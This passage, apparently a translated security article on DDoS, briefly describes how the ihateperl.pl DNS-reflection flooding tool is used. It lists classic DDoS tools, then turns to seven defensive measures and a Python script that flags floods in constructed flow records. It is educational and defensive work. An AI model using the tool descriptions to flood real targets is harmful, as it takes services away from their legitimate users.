- ihateperl.pl is a very small, very effective program based on the DNS-reflective attack.
- It uses a list of DNS servers to flood the network with name-resolution requests.
- For example it can send requests to resolve google.com to those servers, and the domain can be changed to www.vnexperts.net or any other website the attacker wants.
- Using the tool is very simple: create a list of DNS servers, give it the IP address of the target machine and set the number of requests.
XI. DDoS attack tools.
Most of the tools introduced in this article are old and ineffective; they are only of educational value, to help you understand DDoS attacks. The DDoS tools are:
Trinoo - Tribe Flood Network (TFN) - Trinity - TFN2K - Stacheldraht - Shaft - Knight - Mstream - Kaiten
All of these tools can be downloaded free on the Internet, but note that they are weak tools that only serve as DDoS demonstrations.
Denial of service attacks (DDoS)

Distributed denial of service (DDoS) attacks will always be a top threat to IT systems around the world. Technically, we can only hope that the hacker uses well-known tools and has a poor understanding of the protocols, so that the attack traffic can be recognised and filtered out. Every expert agrees that if a DDoS is carried out by a skilled hacker, prevention is impossible. Four years ago the established hacker community declared this technique dead and stopped all research, demonstration and public dissemination of it, because they themselves recognised how dangerous and unfair this kind of attack is. With Vietnam's network infrastructure and e-commerce only just taking shape, DDoS will be a great danger to the Vietnamese Internet.

A denial of service (DoS) attack is an attack on a network system that prevents access to a service such as web or email. A DoS attack disables a network service by flooding it with connections, overloading the server or the programs running on it, exhausting the server's resources, or preventing legitimate users from reaching network services.

There are many ways to carry out denial of service attacks, and therefore many ways to classify them. The common classification is by the protocol used in the attack, for example ICMP flooding with Smurf and Ping of Death, exploiting weaknesses in TCP's protocol operation and packet fragmentation with SYN flood, LAND attacks and TearDrop, or application-layer attacks such as Flash Crowds (also called X-flash).

Classified by method, a DoS can be carried out with a few single packets sent straight to the server to disrupt its operation (as with the Slammer worm), or triggered from many sources (distributed denial of service, DDoS). The attack can be carried out across the Internet (using web servers themselves), broadcast from inside the network (inside attacks, as with the Blaster worm), on peer-to-peer networks (P2P index poisoning) or on wireless networks (WLAN authentication rejection attack with a spoofed sender). These classifications, however, are based mainly on where the attack originates and therefore do not systematise the means of defence.

In general, an organisation should consider the following points when dealing with DoS threats:
1. Preventing application vulnerabilities
Application-level weaknesses and bugs in application programs can be exploited to cause buffer overflows that stop the service or application. Most such bugs are found in applications running on today's most popular operating system, Windows, and in web server, DNS and SQL database software. Patching is one of the most important requirements for preventing application weaknesses. Until patches can be applied and processed on all machines, the system must be protected by virtual patches. In addition, the exchange of content between client and server must be reviewed so that the server is not attacked indirectly, for example through SQL injection.
2. Preventing zombie recruitment
Zombies (also called daemons, slaves or agents) are machines abused into becoming sources of the attack. Typical cases include rootkits (software activated every time the system boots, before the operating system has finished starting; a rootkit can install a hidden file, process or user account on the operating system and can intercept data from terminals, network connections and the keyboard), active content attached to email or web pages (for example JPEG files that exploit bugs in image-processing software, code embedded in Flash files, or trojans installed through phishing), and worm propagation (Netsky, MyDoom). To prevent this, the network needs tools that monitor and filter content (content filtering) to stop attackers from recruiting zombies.

3. Preventing the channels that trigger attack tools
There are many DoS tools, mostly for distributed attacks (DDoS), such as TFN and TFN2000 (Tribe Flood Network), and attacks based on how the protocols work, such as Smurf, UDP, SYN or ICMP (Trinoo for UDP floods; Stacheldraht for TCP ACK, TCP NULL, HAVOC and DNS floods, or TCP floods with random packet headers). These tools share the property that they need a channel to trigger the zombies into attacking a given server. The system needs tools to monitor and block those triggering channels.
4. Blocking bandwidth attacks
When a DDoS attack is launched it is usually detected through a marked change in the network's bandwidth. For example, a normal network may carry 80% TCP traffic and 20% UDP. A clear change in this distribution can be a sign of a DoS attack: the Slammer worm increases UDP traffic, while the Welchia worm generates an ICMP flood. The traffic these worms spread damages routers, firewalls and the network infrastructure. The system needs tools to monitor and shape bandwidth to limit the damage of this kind of attack.
5. Blocking attacks on the SYN/ACK mechanism
SYN flood is one of the oldest DoS attacks still in use today, and the damage it causes has not diminished. The key to defending against it is the ability to control the number of SYN/ACK requests in TCP's three-way handshake reaching the network.
6. Detecting and blocking attacks on the connection limit
A server can only serve a certain number of simultaneous connections. Even a firewall (especially one with stateful inspection) ties every connection to a state table of limited size. Most attacks create large numbers of bogus connections through spoofing. To defend against this, the system must analyse and counter spoofing and control the number of connections from a given source to the server.

7. Detecting and blocking attacks on the connection-establishment rate
One weakness commonly abused on servers is the limited buffer reserved for establishing connections, which overloads under a sudden change in the number of connections. Here a filter that limits the number of connections plays a very important role: it defines a connection-rate threshold for each part of the network.
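Items 4 to 7 above describe signals that can be computed from flow records rather than by hand. The following Python script is an added example, not from the original article; it runs the protocol-mix check (item 4), a half-open SYN count per destination (items 5 and 6) and a per-source connection-establishment rate (item 7) over two constructed 10-second windows, one normal and one carrying a UDP flood from many spoofed sources plus a SYN flood from one host. The record format "ts src dst proto flags bytes", the sample windows and the thresholds are constructed and illustrative; on a real network the thresholds would be tuned from the baseline the article describes.

```python
"""Three of the DoS indicators described above, run over constructed flow
records: the protocol-mix shift (item 4), half-open SYN floods (items 5/6) and
per-source connection-establishment rate (item 7).

Added example, not from the original article. The record format
"ts src dst proto flags bytes" and the sample windows below are constructed;
thresholds are illustrative and would be tuned per network.
"""
from collections import Counter

BASELINE_MIX = {"tcp": 0.80, "udp": 0.20, "icmp": 0.00}   # the article's normal split


def parse_record(line: str) -> dict:
    ts, src, dst, proto, flags, nbytes = line.split()
    return {"ts": float(ts), "src": src, "dst": dst, "proto": proto.lower(),
            "flags": flags, "bytes": int(nbytes)}


def protocol_mix(records) -> dict:
    """Share of bytes per protocol (protocols in the baseline always present)."""
    total = sum(r["bytes"] for r in records) or 1
    by_proto = Counter()
    for r in records:
        by_proto[r["proto"]] += r["bytes"]
    return {p: by_proto[p] / total for p in set(by_proto) | set(BASELINE_MIX)}


def mix_shift(records, baseline=BASELINE_MIX, tolerance=0.25) -> list:
    """Protocols whose byte share moved more than `tolerance` away from the baseline."""
    mix = protocol_mix(records)
    return sorted(p for p in mix if abs(mix[p] - baseline.get(p, 0.0)) > tolerance)


def half_open_per_dst(records) -> Counter:
    """SYN-only flows (no ACK ever seen) per destination: the SYN-flood signal."""
    return Counter(r["dst"] for r in records if r["proto"] == "tcp" and r["flags"] == "S")


def syn_rate_per_src(records, window_s: float) -> dict:
    """New TCP connection attempts per second, per source."""
    syns = Counter(r["src"] for r in records if r["proto"] == "tcp" and "S" in r["flags"])
    return {src: n / window_s for src, n in syns.items()}


def analyze(lines, window_s=10.0, half_open_limit=20, per_src_syn_limit=2.0) -> dict:
    """Apply all three checks to one window of flow lines and return what to act on."""
    records = [parse_record(line) for line in lines]
    return {
        "mix_shift": mix_shift(records),
        "syn_flood_targets": sorted(d for d, n in half_open_per_dst(records).items()
                                    if n > half_open_limit),
        "rate_limit_sources": sorted(s for s, rate in syn_rate_per_src(records, window_s).items()
                                     if rate > per_src_syn_limit),
    }


# ---- constructed 10-second windows (not real flow data) ----------------------
def normal_window() -> list:
    lines = [f"{i * 0.5:.1f} 192.0.2.{i + 1} 10.0.0.5 tcp SA 1500" for i in range(16)]  # completed handshakes
    lines += [f"{i * 2.0:.1f} 192.0.2.{i + 30} 10.0.0.5 udp - 1500" for i in range(4)]  # 20% UDP by bytes
    return lines


def attack_window() -> list:
    lines = normal_window()
    lines += [f"{i * 0.1:.1f} 198.51.100.{i + 1} 10.0.0.5 udp - 1500" for i in range(60)]  # UDP flood, 60 spoofed sources
    lines += [f"{i * 0.25:.2f} 203.0.113.7 10.0.0.5 tcp S 60" for i in range(40)]           # 40 half-open SYNs from one host
    return lines


if __name__ == "__main__":
    print("normal:", analyze(normal_window()))
    print("attack:", analyze(attack_window()))
```

Note what each check can and cannot see: the per-source rate catches the single SYN-flooding host, but the 60 spoofed UDP sources each stay under any per-source limit and are only visible in the aggregate mix shift, which is the article's point that a distributed attack has to be handled by bandwidth and aggregate controls rather than by blocking individual addresses.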

In a system defending against denial of service attacks, the IPS is considered the most important component. Denial of service attacks mainly target the processing capacity of the network, starting with the network security devices themselves. The processing capacity of the IPS is therefore a key property to watch, especially its stability when handling mixed traffic with varying packet sizes at the same time.